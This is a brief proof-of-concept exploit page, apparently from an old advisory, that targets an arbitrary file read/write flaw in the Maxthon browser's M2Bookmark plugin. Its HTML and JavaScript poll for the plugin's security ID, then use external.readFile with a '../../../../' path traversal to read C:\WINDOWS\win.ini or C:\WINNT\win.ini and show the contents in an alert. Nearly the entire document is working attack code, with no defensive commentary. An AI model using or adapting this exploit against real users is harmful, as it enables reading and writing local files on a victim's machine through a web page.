Maxthon arbitrary-file read/write exploit example.
83e15a14c4ca1f73136d1a24e593806b928158a0e285203e908ede1f7670d146
<html>
<script id="max" src="C:\Program Files\Maxthon\Plugin\M2bookmark\max.src"></script>
<script>
var iVuln=null;
function checkVuln() {
try {
if (external.readFile(max_security_id,"m2bookmark","plugin.ini")!=null) {
pls.innerText='Done!';
alert("Vulnerable!");
showFileContent();
window.clearInterval(iVuln);
}
else {
window.status='';
// Refresh the "max.src" script by setting the source file as the same file
max.src=max.src;
}
}
catch(e) {}
}
function showFileContent() {
var dir="WINDOWS";
var content=external.readFile(max_security_id,"m2bookmark","../../../../"+dir+"/win.ini");
if (content==null) {
dir="WINNT";
content=external.readFile(max_security_id,"m2bookmark","../../../../"+dir+"/win.ini");
}
alert("C:\\"+dir+"\\win.ini file content:\n"+content);
}
iVuln=window.setInterval("checkVuln()",1000);
</script>
<body>
<span id="pls">Please open the M2Bookmark sidebar...</span>
</body>
</html>